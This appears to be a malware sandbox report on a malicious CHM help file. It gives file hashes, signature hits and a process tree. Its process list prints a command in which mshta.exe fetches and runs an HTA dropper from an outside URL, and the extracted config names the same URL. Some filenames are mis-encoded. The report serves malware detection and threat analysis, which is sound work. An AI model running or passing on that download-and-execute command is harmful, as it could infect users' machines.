Overview

overview

10

Static

static

8

(20220120)...01.chm

windows7-x64

10

(20220120)...01.chm

windows10-2004-x64

10

(์–‘์‹) ์...0).chm

windows7-x64

1

(์–‘์‹) ์...0).chm

windows10-2004-x64

1

(์–‘์‹) ์...0).xls

windows7-x64

10

(์–‘์‹) ์...0).xls

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-03-2023 23:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    (20220120)2022 - 001.chm

  • Size

    331KB

  • MD5

    914521cb6b4846b2c0e85588d5224ba2

  • SHA1

    9171d8b916637bd4b1b4348c1744d8f25a2363c6

  • SHA256

    a88dc9a152cc7758a1df5aa33cf7b31cdb14e593a8744f2059602a49b8b04e0f

  • SHA512

    cfc3f84a08213f8a1883f0ca6164067e4dfa59d8655e0c2f0fcba0bf985555bb0dca00b5eae0bfaa9ad6861736e9dfe57af490faeb53553d60c460a51d3233c8

  • SSDEEP

    6144:tWVDblCou9OdcHSgSLaCjPjjaZL4annWryMGfdnSavw/5q/Rhc/UVkRJU1yq9i8y:uM3W0jSL3n4F5nlLW+ye/y

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://attiferstudio.com/install.bak/sony/10.html

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" "C:\Users\Admin\AppData\Local\Temp\(20220120)2022 - 001.chm"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3760
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" http://attiferstudio.com/install.bak/sony/10.html ,
      2⤵
      • Blocklisted process makes network request
      PID:3620

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3760-140-0x00000201AA970000-0x00000201AAE27000-memory.dmp
    Filesize

    4.7MB

    Download